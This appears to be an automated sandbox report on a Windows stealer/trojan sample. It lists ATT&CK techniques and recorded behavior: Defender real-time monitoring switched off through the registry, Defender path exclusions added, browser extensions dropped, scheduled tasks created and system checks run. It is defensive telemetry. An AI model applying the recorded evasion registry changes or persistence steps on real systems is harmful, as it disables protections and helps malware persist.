Malware Analysis Report

2024-09-11 13:30

Sample ID 240613-3jzwhsyhlk
Target 8f3739a48f3309a717d2010c14e4c6f7c7b4c212940024cc5937b43d7d914e10
SHA256 8f3739a48f3309a717d2010c14e4c6f7c7b4c212940024cc5937b43d7d914e10
Tags
discovery evasion execution spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

8f3739a48f3309a717d2010c14e4c6f7c7b4c212940024cc5937b43d7d914e10

Threat Level: Known bad

The file 8f3739a48f3309a717d2010c14e4c6f7c7b4c212940024cc5937b43d7d914e10 was found to be: Known bad.

Malicious Activity Summary

discovery evasion execution spyware stealer trojan

Windows security bypass

Modifies Windows Defender Real-time Protection settings

Blocklisted process makes network request

Command and Scripting Interpreter: PowerShell

Loads dropped DLL

Executes dropped EXE

Reads user/profile data of web browsers

Checks computer location settings

Checks BIOS information in registry

Drops Chrome extension

Drops desktop.ini file(s)

Checks installed software on the system

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Unsigned PE

Enumerates physical storage devices

Program crash

Enumerates system info in registry

Modifies data under HKEY_USERS

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Creates scheduled task(s)

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Command and Scripting Interpreter
T1059
PowerShell
T1059.001
Scheduled Task/Job
T1053
Persistence
TA0003
Create or Modify System Process
T1543
Windows Service
T1543.003
Scheduled Task/Job
T1053
Privilege Escalation
TA0004
Create or Modify System Process
T1543
Windows Service
T1543.003
Scheduled Task/Job
T1053
Defense Evasion
TA0005
Modify Registry
T1112
Impair Defenses
T1562
Disable or Modify Tools
T1562.001
Credential Access
TA0006
Unsecured Credentials
T1552
Credentials In Files
T1552.001
Discovery
TA0007
Query Registry
T1012
System Information Discovery
T1082
Lateral Movement
TA0008
Collection
TA0009
Data from Local System
T1005
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-06-13 23:33

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-13 23:33

Reported

2024-06-13 23:38

Platform

win7-20240221-en

Max time kernel

209s

Max time network

210s

Command Line

"C:\Users\Admin\AppData\Local\Temp\8f3739a48f3309a717d2010c14e4c6f7c7b4c212940024cc5937b43d7d914e10.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection C:\Windows\SysWOW64\reg.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\JbudRisgU = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\JbudRisgU = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\dCtMvmKVJeporrZwH = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\LHhfOSCKsioeHeSb = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\LHhfOSCKsioeHeSb = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\LHhfOSCKsioeHeSb = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\KDIdGNeaPBYNADfhwFR = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\dCtMvmKVJeporrZwH = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\LHhfOSCKsioeHeSb = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\BspasHMSlPUn = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\SRtRtaafQKnfEXVB = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\VloXEwfyUAdsC = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\VloXEwfyUAdsC = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\KDIdGNeaPBYNADfhwFR = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\SRtRtaafQKnfEXVB = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\zpocSIDFTSWU2 = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\BspasHMSlPUn = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\zpocSIDFTSWU2 = "0" C:\Windows\SysWOW64\reg.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS22CC.tmp\Install.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS1FFF.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS22CC.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\dCtMvmKVJeporrZwH\dMonoOYAZKifzjw\vtLGwLO.exe N/A
N/A N/A C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\8f3739a48f3309a717d2010c14e4c6f7c7b4c212940024cc5937b43d7d914e10.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS1FFF.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS1FFF.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS1FFF.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS1FFF.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS22CC.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS22CC.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS22CC.tmp\Install.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\dCtMvmKVJeporrZwH\dMonoOYAZKifzjw\vtLGwLO.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_89FBEB9EEBFF8AABF1EBFA20B87AFE7E C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\dCtMvmKVJeporrZwH\dMonoOYAZKifzjw\vtLGwLO.exe N/A
File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_89FBEB9EEBFF8AABF1EBFA20B87AFE7E C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_95776108E5303B05527E9B63C6628F47 C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_95776108E5303B05527E9B63C6628F47 C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_0E84AD23AC2E74B30DEF739614C7EB94 C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\dCtMvmKVJeporrZwH\dMonoOYAZKifzjw\vtLGwLO.exe N/A
File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\dCtMvmKVJeporrZwH\dMonoOYAZKifzjw\vtLGwLO.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_0E84AD23AC2E74B30DEF739614C7EB94 C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\JbudRisgU\OwsbqoD.xml C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
File created C:\Program Files (x86)\KDIdGNeaPBYNADfhwFR\MkacYGZ.xml C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
File created C:\Program Files (x86)\BspasHMSlPUn\LqnwOkR.dll C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
File created C:\Program Files (x86)\zpocSIDFTSWU2\iOAVcJD.xml C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
File created C:\Program Files (x86)\KDIdGNeaPBYNADfhwFR\cfACIvT.dll C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
File created C:\Program Files (x86)\JbudRisgU\RuuYay.dll C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
File created C:\Program Files (x86)\zpocSIDFTSWU2\eRXuOuJYOabyy.dll C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
File created C:\Program Files (x86)\VloXEwfyUAdsC\xorvbkV.dll C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
File created C:\Program Files (x86)\VloXEwfyUAdsC\QFuXyqM.xml C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\bqHlMUmkmlcBkJQYdf.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\upHNLFTuuiluCLfgh.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\lRoQVRoUFrjOsqP.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\QGYoMddbcQsigCFfl.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\dCtMvmKVJeporrZwH\dMonoOYAZKifzjw\vtLGwLO.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\7zS22CC.tmp\Install.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS22CC.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS22CC.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{E37A4A68-9935-456D-A74E-22D5AFBB3917} C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\a6-c5-cc-b4-62-fb C:\Windows\SysWOW64\rundll32.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\a6-c5-cc-b4-62-fb\WpadDecisionReason = "1" C:\Windows\SysWOW64\rundll32.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" C:\Windows\SysWOW64\wscript.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{E37A4A68-9935-456D-A74E-22D5AFBB3917}\WpadDecisionReason = "1" C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\a6-c5-cc-b4-62-fb C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad C:\Windows\SysWOW64\rundll32.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\a6-c5-cc-b4-62-fb\WpadDecisionTime = d0f3184eeabdda01 C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My C:\Windows\Temp\LHhfOSCKsioeHeSb\TXXUJQsQMicSATX\kRyHuwm.exe N/A
